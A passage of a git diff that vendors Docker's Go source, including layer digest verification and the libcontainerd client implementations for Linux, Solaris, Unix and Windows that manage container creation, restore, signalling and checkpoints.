+		return err
+	}
+	if err := tx.SetCacheID(layer.cacheID); err != nil {
+		return err
+	}
+	// Do not store empty descriptors
+	if layer.descriptor.Digest != "" {
+		if err := tx.SetDescriptor(layer.descriptor); err != nil {
+			return err
+		}
+	}
+	if layer.parent != nil {
+		if err := tx.SetParent(layer.parent.chainID); err != nil {
+			return err
+		}
+	}
+
+	return nil
+}
+
+func newVerifiedReadCloser(rc io.ReadCloser, dgst digest.Digest) (io.ReadCloser, error) {
+	verifier, err := digest.NewDigestVerifier(dgst)
+	if err != nil {
+		return nil, err
+	}
+	return &verifiedReadCloser{
+		rc:       rc,
+		dgst:     dgst,
+		verifier: verifier,
+	}, nil
+}
+
+type verifiedReadCloser struct {
+	rc       io.ReadCloser
+	dgst     digest.Digest
+	verifier digest.Verifier
+}
+
+func (vrc *verifiedReadCloser) Read(p []byte) (n int, err error) {
+	n, err = vrc.rc.Read(p)
+	if n > 0 {
+		if n, err := vrc.verifier.Write(p[:n]); err != nil {
+			return n, err
+		}
+	}
+	if err == io.EOF {
+		if !vrc.verifier.Verified() {
+			err = fmt.Errorf("could not verify layer data for: %s. This may be because internal files in the layer store were modified. Re-pulling or rebuilding this image may resolve the issue", vrc.dgst)
+		}
+	}
+	return
+}
+func (vrc *verifiedReadCloser) Close() error {
+	return vrc.rc.Close()
+}
diff --git a/vendor/github.com/docker/docker/layer/ro_layer_windows.go b/vendor/github.com/docker/docker/layer/ro_layer_windows.go
new file mode 100644
index 0000000000..32bd7182a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/ro_layer_windows.go
@@ -0,0 +1,9 @@
+package layer
+
+import "github.com/docker/distribution"
+
+var _ distribution.Describable = &roLayer{}
+
+func (rl *roLayer) Descriptor() distribution.Descriptor {
+	return rl.descriptor
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client.go b/vendor/github.com/docker/docker/libcontainerd/client.go
new file mode 100644
index 0000000000..c14c1c5e46
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client.go
@@ -0,0 +1,46 @@
+package libcontainerd
+
+import (
+	"fmt"
+	"sync"
+
+	"github.com/docker/docker/pkg/locker"
+)
+
+// clientCommon contains the platform agnostic fields used in the client structure
+type clientCommon struct {
+	backend    Backend
+	containers map[string]*container
+	locker     *locker.Locker
+	mapMutex   sync.RWMutex // protects read/write oprations from containers map
+}
+
+func (clnt *client) lock(containerID string) {
+	clnt.locker.Lock(containerID)
+}
+
+func (clnt *client) unlock(containerID string) {
+	clnt.locker.Unlock(containerID)
+}
+
+// must hold a lock for cont.containerID
+func (clnt *client) appendContainer(cont *container) {
+	clnt.mapMutex.Lock()
+	clnt.containers[cont.containerID] = cont
+	clnt.mapMutex.Unlock()
+}
+func (clnt *client) deleteContainer(containerID string) {
+	clnt.mapMutex.Lock()
+	delete(clnt.containers, containerID)
+	clnt.mapMutex.Unlock()
+}
+
+func (clnt *client) getContainer(containerID string) (*container, error) {
+	clnt.mapMutex.RLock()
+	container, ok := clnt.containers[containerID]
+	defer clnt.mapMutex.RUnlock()
+	if !ok {
+		return nil, fmt.Errorf("invalid container: %s", containerID) // fixme: typed error
+	}
+	return container, nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_linux.go b/vendor/github.com/docker/docker/libcontainerd/client_linux.go
new file mode 100644
index 0000000000..190f981865
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_linux.go
@@ -0,0 +1,605 @@
+package libcontainerd
+
+import (
+	"fmt"
+	"os"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/mount"
+	"github.com/golang/protobuf/ptypes"
+	"github.com/golang/protobuf/ptypes/timestamp"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"golang.org/x/net/context"
+)
+
+type client struct {
+	clientCommon
+
+	// Platform specific properties below here.
+	remote        *remote
+	q             queue
+	exitNotifiers map[string]*exitNotifier
+	liveRestore   bool
+}
+
+// GetServerVersion returns the connected server version information
+func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
+	resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{})
+	if err != nil {
+		return nil, err
+	}
+
+	sv := &ServerVersion{
+		GetServerVersionResponse: *resp,
+	}
+
+	return sv, nil
+}
+
+// AddProcess is the handler for adding a process to an already running
+// container. It's called through docker exec. It returns the system pid of the
+// exec'd process.
+func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (pid int, err error) {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return -1, err
+	}
+
+	spec, err := container.spec()
+	if err != nil {
+		return -1, err
+	}
+	sp := spec.Process
+	sp.Args = specp.Args
+	sp.Terminal = specp.Terminal
+	if len(specp.Env) > 0 {
+		sp.Env = specp.Env
+	}
+	if specp.Cwd != nil {
+		sp.Cwd = *specp.Cwd
+	}
+	if specp.User != nil {
+		sp.User = specs.User{
+			UID:            specp.User.UID,
+			GID:            specp.User.GID,
+			AdditionalGids: specp.User.AdditionalGids,
+		}
+	}
+	if specp.Capabilities != nil {
+		sp.Capabilities = specp.Capabilities
+	}
+
+	p := container.newProcess(processFriendlyName)
+
+	r := &containerd.AddProcessRequest{
+		Args:     sp.Args,
+		Cwd:      sp.Cwd,
+		Terminal: sp.Terminal,
+		Id:       containerID,
+		Env:      sp.Env,
+		User: &containerd.User{
+			Uid:            sp.User.UID,
+			Gid:            sp.User.GID,
+			AdditionalGids: sp.User.AdditionalGids,
+		},
+		Pid:             processFriendlyName,
+		Stdin:           p.fifo(syscall.Stdin),
+		Stdout:          p.fifo(syscall.Stdout),
+		Stderr:          p.fifo(syscall.Stderr),
+		Capabilities:    sp.Capabilities,
+		ApparmorProfile: sp.ApparmorProfile,
+		SelinuxLabel:    sp.SelinuxLabel,
+		NoNewPrivileges: sp.NoNewPrivileges,
+		Rlimits:         convertRlimits(sp.Rlimits),
+	}
+
+	fifoCtx, cancel := context.WithCancel(context.Background())
+	defer func() {
+		if err != nil {
+			cancel()
+		}
+	}()
+
+	iopipe, err := p.openFifos(fifoCtx, sp.Terminal)
+	if err != nil {
+		return -1, err
+	}
+
+	resp, err := clnt.remote.apiClient.AddProcess(ctx, r)
+	if err != nil {
+		p.closeFifos(iopipe)
+		return -1, err
+	}
+
+	var stdinOnce sync.Once
+	stdin := iopipe.Stdin
+	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
+		var err error
+		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
+			err = stdin.Close()
+			if err2 := p.sendCloseStdin(); err == nil {
+				err = err2
+			}
+		})
+		return err
+	})
+
+	container.processes[processFriendlyName] = p
+
+	if err := attachStdio(*iopipe); err != nil {
+		p.closeFifos(iopipe)
+		return -1, err
+	}
+
+	return int(resp.SystemPid), nil
+}
+
+func (clnt *client) SignalProcess(containerID string, pid string, sig int) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	_, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{
+		Id:     containerID,
+		Pid:    pid,
+		Signal: uint32(sig),
+	})
+	return err
+}
+
+func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	if _, err := clnt.getContainer(containerID); err != nil {
+		return err
+	}
+	_, err := clnt.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{
+		Id:     containerID,
+		Pid:    processFriendlyName,
+		Width:  uint32(width),
+		Height: uint32(height),
+	})
+	return err
+}
+
+func (clnt *client) Pause(containerID string) error {
+	return clnt.setState(containerID, StatePause)
+}
+
+func (clnt *client) setState(containerID, state string) error {
+	clnt.lock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		clnt.unlock(containerID)
+		return err
+	}
+	if container.systemPid == 0 {
+		clnt.unlock(containerID)
+		return fmt.Errorf("No active process for container %s", containerID)
+	}
+	st := "running"
+	if state == StatePause {
+		st = "paused"
+	}
+	chstate := make(chan struct{})
+	_, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{
+		Id:     containerID,
+		Pid:    InitFriendlyName,
+		Status: st,
+	})
+	if err != nil {
+		clnt.unlock(containerID)
+		return err
+	}
+	container.pauseMonitor.append(state, chstate)
+	clnt.unlock(containerID)
+	<-chstate
+	return nil
+}
+
+func (clnt *client) Resume(containerID string) error {
+	return clnt.setState(containerID, StateResume)
+}
+
+func (clnt *client) Stats(containerID string) (*Stats, error) {
+	resp, err := clnt.remote.apiClient.Stats(context.Background(), &containerd.StatsRequest{containerID})
+	if err != nil {
+		return nil, err
+	}
+	return (*Stats)(resp), nil
+}
+
+// Take care of the old 1.11.0 behavior in case the version upgrade
+// happened without a clean daemon shutdown
+func (clnt *client) cleanupOldRootfs(containerID string) {
+	// Unmount and delete the bundle folder
+	if mts, err := mount.GetMounts(); err == nil {
+		for _, mts := range mts {
+			if strings.HasSuffix(mts.Mountpoint, containerID+"/rootfs") {
+				if err := syscall.Unmount(mts.Mountpoint, syscall.MNT_DETACH); err == nil {
+					os.RemoveAll(strings.TrimSuffix(mts.Mountpoint, "/rootfs"))
+				}
+				break
+			}
+		}
+	}
+}
+
+func (clnt *client) setExited(containerID string, exitCode uint32) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+
+	err := clnt.backend.StateChanged(containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State:    StateExit,
+			ExitCode: exitCode,
+		}})
+
+	clnt.cleanupOldRootfs(containerID)
+
+	return err
+}
+
+func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
+	cont, err := clnt.getContainerdContainer(containerID)
+	if err != nil {
+		return nil, err
+	}
+	pids := make([]int, len(cont.Pids))
+	for i, p := range cont.Pids {
+		pids[i] = int(p)
+	}
+	return pids, nil
+}
+
+// Summary returns a summary of the processes running in a container.
+// This is a no-op on Linux.
+func (clnt *client) Summary(containerID string) ([]Summary, error) {
+	return nil, nil
+}
+
+func (clnt *client) getContainerdContainer(containerID string) (*containerd.Container, error) {
+	resp, err := clnt.remote.apiClient.State(context.Background(), &containerd.StateRequest{Id: containerID})
+	if err != nil {
+		return nil, err
+	}
+	for _, cont := range resp.Containers {
+		if cont.Id == containerID {
+			return cont, nil
+		}
+	}
+	return nil, fmt.Errorf("invalid state response")
+}
+
+func (clnt *client) UpdateResources(containerID string, resources Resources) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	container, err := clnt.getContainer(containerID)
+	if err != nil {
+		return err
+	}
+	if container.systemPid == 0 {
+		return fmt.Errorf("No active process for container %s", containerID)
+	}
+	_, err = clnt.remote.apiClient.UpdateContainer(context.Background(), &containerd.UpdateContainerRequest{
+		Id:        containerID,
+		Pid:       InitFriendlyName,
+		Resources: (*containerd.UpdateResource)(&resources),
+	})
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+func (clnt *client) getExitNotifier(containerID string) *exitNotifier {
+	clnt.mapMutex.RLock()
+	defer clnt.mapMutex.RUnlock()
+	return clnt.exitNotifiers[containerID]
+}
+
+func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier {
+	clnt.mapMutex.Lock()
+	w, ok := clnt.exitNotifiers[containerID]
+	defer clnt.mapMutex.Unlock()
+	if !ok {
+		w = &exitNotifier{c: make(chan struct{}), client: clnt}
+		clnt.exitNotifiers[containerID] = w
+	}
+	return w
+}
+
+func (clnt *client) restore(cont *containerd.Container, lastEvent *containerd.Event, attachStdio StdioCallback, options ...CreateOption) (err error) {
+	clnt.lock(cont.Id)
+	defer clnt.unlock(cont.Id)
+
+	logrus.Debugf("libcontainerd: restore container %s state %s", cont.Id, cont.Status)
+
+	containerID := cont.Id
+	if _, err := clnt.getContainer(containerID); err == nil {
+		return fmt.Errorf("container %s is already active", containerID)
+	}
+
+	defer func() {
+		if err != nil {
+			clnt.deleteContainer(cont.Id)
+		}
+	}()
+
+	container := clnt.newContainer(cont.BundlePath, options...)
+	container.systemPid = systemPid(cont)
+
+	var terminal bool
+	for _, p := range cont.Processes {
+		if p.Pid == InitFriendlyName {
+			terminal = p.Terminal
+		}
+	}
+
+	fifoCtx, cancel := context.WithCancel(context.Background())
+	defer func() {
+		if err != nil {
+			cancel()
+		}
+	}()
+
+	iopipe, err := container.openFifos(fifoCtx, terminal)
+	if err != nil {
+		return err
+	}
+	var stdinOnce sync.Once
+	stdin := iopipe.Stdin
+	iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error {
+		var err error
+		stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed
+			err = stdin.Close()
+		})
+		return err
+	})
+
+	if err := attachStdio(*iopipe); err != nil {
+		container.closeFifos(iopipe)
+		return err
+	}
+
+	clnt.appendContainer(container)
+
+	err = clnt.backend.StateChanged(containerID, StateInfo{
+		CommonStateInfo: CommonStateInfo{
+			State: StateRestore,
+			Pid:   container.systemPid,
+		}})
+
+	if err != nil {
+		container.closeFifos(iopipe)
+		return err
+	}
+
+	if lastEvent != nil {
+		// This should only be a pause or resume event
+		if lastEvent.Type == StatePause || lastEvent.Type == StateResume {
+			return clnt.backend.StateChanged(containerID, StateInfo{
+				CommonStateInfo: CommonStateInfo{
+					State: lastEvent.Type,
+					Pid:   container.systemPid,
+				}})
+		}
+
+		logrus.Warnf("libcontainerd: unexpected backlog event: %#v", lastEvent)
+	}
+
+	return nil
+}
+
+func (clnt *client) getContainerLastEventSinceTime(id string, tsp *timestamp.Timestamp) (*containerd.Event, error) {
+	er := &containerd.EventsRequest{
+		Timestamp:  tsp,
+		StoredOnly: true,
+		Id:         id,
+	}
+	events, err := clnt.remote.apiClient.Events(context.Background(), er)
+	if err != nil {
+		logrus.Errorf("libcontainerd: failed to get container events stream for %s: %q", er.Id, err)
+		return nil, err
+	}
+
+	var ev *containerd.Event
+	for {
+		e, err := events.Recv()
+		if err != nil {
+			if err.Error() == "EOF" {
+				break
+			}
+			logrus.Errorf("libcontainerd: failed to get container event for %s: %q", id, err)
+			return nil, err
+		}
+		ev = e
+		logrus.Debugf("libcontainerd: received past event %#v", ev)
+	}
+
+	return ev, nil
+}
+
+func (clnt *client) getContainerLastEvent(id string) (*containerd.Event, error) {
+	ev, err := clnt.getContainerLastEventSinceTime(id, clnt.remote.restoreFromTimestamp)
+	if err == nil && ev == nil {
+		// If ev is nil and the container is running in containerd,
+		// we already consumed all the event of the
+		// container, included the "exit" one.
+		// Thus, we request all events containerd has in memory for
+		// this container in order to get the last one (which should
+		// be an exit event)
+		logrus.Warnf("libcontainerd: client is out of sync, restore was called on a fully synced container (%s).", id)
+		// Request all events since beginning of time
+		t := time.Unix(0, 0)
+		tsp, err := ptypes.TimestampProto(t)
+		if err != nil {
+			logrus.Errorf("libcontainerd: getLastEventSinceTime() failed to convert timestamp: %q", err)
+			return nil, err
+		}
+
+		return clnt.getContainerLastEventSinceTime(id, tsp)
+	}
+
+	return ev, err
+}
+
+func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error {
+	// Synchronize with live events
+	clnt.remote.Lock()
+	defer clnt.remote.Unlock()
+	// Check that containerd still knows this container.
+	//
+	// In the unlikely event that Restore for this container process
+	// the its past event before the main loop, the event will be
+	// processed twice. However, this is not an issue as all those
+	// events will do is change the state of the container to be
+	// exactly the same.
+	cont, err := clnt.getContainerdContainer(containerID)
+	// Get its last event
+	ev, eerr := clnt.getContainerLastEvent(containerID)
+	if err != nil || cont.Status == "Stopped" {
+		if err != nil {
+			logrus.Warnf("libcontainerd: failed to retrieve container %s state: %v", containerID, err)
+		}
+		if ev != nil && (ev.Pid != InitFriendlyName || ev.Type != StateExit) {
+			// Wait a while for the exit event
+			timeout := time.NewTimer(10 * time.Second)
+			tick := time.NewTicker(100 * time.Millisecond)
+		stop:
+			for {
+				select {
+				case <-timeout.C:
+					break stop
+				case <-tick.C:
+					ev, eerr = clnt.getContainerLastEvent(containerID)
+					if eerr != nil {
+						break stop
+					}
+					if ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit {
+						break stop
+					}
+				}
+			}
+			timeout.Stop()
+			tick.Stop()
+		}
+
+		// get the exit status for this container, if we don't have
+		// one, indicate an error
+		ec := uint32(255)
+		if eerr == nil && ev != nil && ev.Pid == InitFriendlyName && ev.Type == StateExit {
+			ec = ev.Status
+		}
+		clnt.setExited(containerID, ec)
+
+		return nil
+	}
+
+	// container is still alive
+	if clnt.liveRestore {
+		if err := clnt.restore(cont, ev, attachStdio, options...); err != nil {
+			logrus.Errorf("libcontainerd: error restoring %s: %v", containerID, err)
+		}
+		return nil
+	}
+
+	// Kill the container if liveRestore == false
+	w := clnt.getOrCreateExitNotifier(containerID)
+	clnt.lock(cont.Id)
+	container := clnt.newContainer(cont.BundlePath)
+	container.systemPid = systemPid(cont)
+	clnt.appendContainer(container)
+	clnt.unlock(cont.Id)
+
+	container.discardFifos()
+
+	if err := clnt.Signal(containerID, int(syscall.SIGTERM)); err != nil {
+		logrus.Errorf("libcontainerd: error sending sigterm to %v: %v", containerID, err)
+	}
+	// Let the main loop handle the exit event
+	clnt.remote.Unlock()
+	select {
+	case <-time.After(10 * time.Second):
+		if err := clnt.Signal(containerID, int(syscall.SIGKILL)); err != nil {
+			logrus.Errorf("libcontainerd: error sending sigkill to %v: %v", containerID, err)
+		}
+		select {
+		case <-time.After(2 * time.Second):
+		case <-w.wait():
+			// relock because of the defer
+			clnt.remote.Lock()
+			return nil
+		}
+	case <-w.wait():
+		// relock because of the defer
+		clnt.remote.Lock()
+		return nil
+	}
+	// relock because of the defer
+	clnt.remote.Lock()
+
+	clnt.deleteContainer(containerID)
+
+	return clnt.setExited(containerID, uint32(255))
+}
+
+func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	if _, err := clnt.getContainer(containerID); err != nil {
+		return err
+	}
+
+	_, err := clnt.remote.apiClient.CreateCheckpoint(context.Background(), &containerd.CreateCheckpointRequest{
+		Id: containerID,
+		Checkpoint: &containerd.Checkpoint{
+			Name:        checkpointID,
+			Exit:        exit,
+			Tcp:         true,
+			UnixSockets: true,
+			Shell:       false,
+			EmptyNS:     []string{"network"},
+		},
+		CheckpointDir: checkpointDir,
+	})
+	return err
+}
+
+func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	if _, err := clnt.getContainer(containerID); err != nil {
+		return err
+	}
+
+	_, err := clnt.remote.apiClient.DeleteCheckpoint(context.Background(), &containerd.DeleteCheckpointRequest{
+		Id:            containerID,
+		Name:          checkpointID,
+		CheckpointDir: checkpointDir,
+	})
+	return err
+}
+
+func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	if _, err := clnt.getContainer(containerID); err != nil {
+		return nil, err
+	}
+
+	resp, err := clnt.remote.apiClient.ListCheckpoint(context.Background(), &containerd.ListCheckpointRequest{
+		Id:            containerID,
+		CheckpointDir: checkpointDir,
+	})
+	if err != nil {
+		return nil, err
+	}
+	return (*Checkpoints)(resp), nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go
new file mode 100644
index 0000000000..cb939975f8
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go
@@ -0,0 +1,101 @@
+package libcontainerd
+
+import "golang.org/x/net/context"
+
+type client struct {
+	clientCommon
+
+	// Platform specific properties below here.
+	remote        *remote
+	q             queue
+	exitNotifiers map[string]*exitNotifier
+	liveRestore   bool
+}
+
+// GetServerVersion returns the connected server version information
+func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) {
+	resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{})
+	if err != nil {
+		return nil, err
+	}
+
+	sv := &ServerVersion{
+		GetServerVersionResponse: *resp,
+	}
+
+	return sv, nil
+}
+
+func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) {
+	return -1, nil
+}
+
+func (clnt *client) SignalProcess(containerID string, pid string, sig int) error {
+	return nil
+}
+
+func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error {
+	return nil
+}
+
+func (clnt *client) Pause(containerID string) error {
+	return nil
+}
+
+func (clnt *client) Resume(containerID string) error {
+	return nil
+}
+
+func (clnt *client) Stats(containerID string) (*Stats, error) {
+	return nil, nil
+}
+
+func (clnt *client) getExitNotifier(containerID string) *exitNotifier {
+	clnt.mapMutex.RLock()
+	defer clnt.mapMutex.RUnlock()
+	return clnt.exitNotifiers[containerID]
+}
+
+func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier {
+	clnt.mapMutex.Lock()
+	defer clnt.mapMutex.Unlock()
+	w, ok := clnt.exitNotifiers[containerID]
+	if !ok {
+		w = &exitNotifier{c: make(chan struct{}), client: clnt}
+		clnt.exitNotifiers[containerID] = w
+	}
+	return w
+}
+
+// Restore is the handler for restoring a container
+func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error {
+	return nil
+}
+
+func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) {
+	return nil, nil
+}
+
+// Summary returns a summary of the processes running in a container.
+func (clnt *client) Summary(containerID string) ([]Summary, error) {
+	return nil, nil
+}
+
+// UpdateResources updates resources for a running container.
+func (clnt *client) UpdateResources(containerID string, resources Resources) error {
+	// Updating resource isn't supported on Solaris
+	// but we should return nil for enabling updating container
+	return nil
+}
+
+func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error {
+	return nil
+}
+
+func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error {
+	return nil
+}
+
+func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) {
+	return nil, nil
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go
new file mode 100644
index 0000000000..21e8fea666
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_unix.go
@@ -0,0 +1,142 @@
+// +build linux solaris
+
+package libcontainerd
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/docker/docker/pkg/idtools"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+	"golang.org/x/net/context"
+)
+
+func (clnt *client) prepareBundleDir(uid, gid int) (string, error) {
+	root, err := filepath.Abs(clnt.remote.stateDir)
+	if err != nil {
+		return "", err
+	}
+	if uid == 0 && gid == 0 {
+		return root, nil
+	}
+	p := string(filepath.Separator)
+	for _, d := range strings.Split(root, string(filepath.Separator))[1:] {
+		p = filepath.Join(p, d)
+		fi, err := os.Stat(p)
+		if err != nil && !os.IsNotExist(err) {
+			return "", err
+		}
+		if os.IsNotExist(err) || fi.Mode()&1 == 0 {
+			p = fmt.Sprintf("%s.%d.%d", p, uid, gid)
+			if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) {
+				return "", err
+			}
+		}
+	}
+	return p, nil
+}
+
+func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+
+	if _, err := clnt.getContainer(containerID); err == nil {
+		return fmt.Errorf("Container %s is already active", containerID)
+	}
+
+	uid, gid, err := getRootIDs(specs.Spec(spec))
+	if err != nil {
+		return err
+	}
+	dir, err := clnt.prepareBundleDir(uid, gid)
+	if err != nil {
+		return err
+	}
+
+	container := clnt.newContainer(filepath.Join(dir, containerID), options...)
+	if err := container.clean(); err != nil {
+		return err
+	}
+
+	defer func() {
+		if err != nil {
+			container.clean()
+			clnt.deleteContainer(containerID)
+		}
+	}()
+
+	if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) {
+		return err
+	}
+
+	f, err := os.Create(filepath.Join(container.dir, configFilename))
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	if err := json.NewEncoder(f).Encode(spec); err != nil {
+		return err
+	}
+
+	return container.start(checkpoint, checkpointDir, attachStdio)
+}
+
+func (clnt *client) Signal(containerID string, sig int) error {
+	clnt.lock(containerID)
+	defer clnt.unlock(containerID)
+	_, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{
+		Id:     containerID,
+		Pid:    InitFriendlyName,
+		Signal: uint32(sig),
+	})
+	return err
+}
+
+func (clnt *client) newContainer(dir string, options ...CreateOption) *container {
+	container := &container{
+		containerCommon: containerCommon{
+			process: process{
+				dir: dir,
+				processCommon: processCommon{
+					containerID:  filepath.Base(dir),
+					client:       clnt,
+					friendlyName: InitFriendlyName,
+				},
+			},
+			processes: make(map[string]*process),
+		},
+	}
+	for _, option := range options {
+		if err := option.Apply(container); err != nil {
+			logrus.Errorf("libcontainerd: newContainer(): %v", err)
+		}
+	}
+	return container
+}
+
+type exitNotifier struct {
+	id     string
+	client *client
+	c      chan struct{}
+	once   sync.Once
+}
+
+func (en *exitNotifier) close() {
+	en.once.Do(func() {
+		close(en.c)
+		en.client.mapMutex.Lock()
+		if en == en.client.exitNotifiers[en.id] {
+			delete(en.client.exitNotifiers, en.id)
+		}
+		en.client.mapMutex.Unlock()
+	})
+}
+func (en *exitNotifier) wait() <-chan struct{} {
+	return en.c
+}
diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go
new file mode 100644
index 0000000000..ddcf321c85
--- /dev/null
+++ b/vendor/github.com/docker/docker/libcontainerd/client_windows.go
@@ -0,0 +1,631 @@
+package libcontainerd
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	"golang.org/x/net/context"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+type client struct {
+	clientCommon
+
+	// Platform specific properties below here (none presently on Windows)
+}
+
+// Win32 error codes that are used for various workarounds
+// These really should be ALL_CAPS to match golangs syscall library and standard
+// Win32 error conventions, but golint insists on CamelCase.
+const (
+	CoEClassstring     = syscall.Errno(0x800401F3) // Invalid class string
+	ErrorNoNetwork     = syscall.Errno(1222)       // The network is not present or not started
+	ErrorBadPathname   = syscall.Errno(161)        // The specified path is invalid
+	ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object
+)
+
+// defaultOwner is a tag passed to HCS to allow it to differentiate between
+// container creator management stacks. We hard code "docker" in the case
+// of docker.
+const defaultOwner = "docker"
+
+// Create is the entrypoint to create a container from a spec, and if successfully
+// created, start it too. Table below shows the fields required for HCS JSON calling parameters,
+// where if not populated, is omitted.
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+// |                 | Isolation=Process                          | Isolation=Hyper-V                                 |
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+// | VolumePath      | \\?\\Volume{GUIDa}                         |                                                   |
+// | LayerFolderPath | %root%\windowsfilter\containerID           | %root%\windowsfilter\containerID (servicing only) |
+// | Layers[]        | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID        |
+// | SandboxPath     |                                            | %root%\windowsfilter                              |
+// | HvRuntime       |                                            | ImagePath=%root%\BaseLayerID\UtilityVM            |
+// +-----------------+--------------------------------------------+---------------------------------------------------+
+//
+// Isolation=Process example:
+//
+// {
+//	"SystemType": "Container",
+//	"Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
+//	"Owner": "docker",
+//	"IsDummy": false,
+//	"VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}",
+//	"IgnoreFlushesDuringBoot": true,
+//	"LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776",
+//	"Layers": [{
+//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
+//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
+//	}],
+//	"HostName": "5e0055c814a6",
+//	"MappedDirectories": [],
+//	"HvPartition": false,
+//	"EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"],
+//	"Servicing": false
+//}
+//
+// Isolation=Hyper-V example:
+//
+//{
+//	"SystemType": "Container",
+//	"Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d",
+//	"Owner": "docker",
+//	"IsDummy": false,
+//	"IgnoreFlushesDuringBoot": true,
+//	"Layers": [{
+//		"ID": "18955d65-d45a-557b-bf1c-49d6dfefc526",
+//		"Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c"
+//	}],
+//	"HostName": "475c2c58933b",
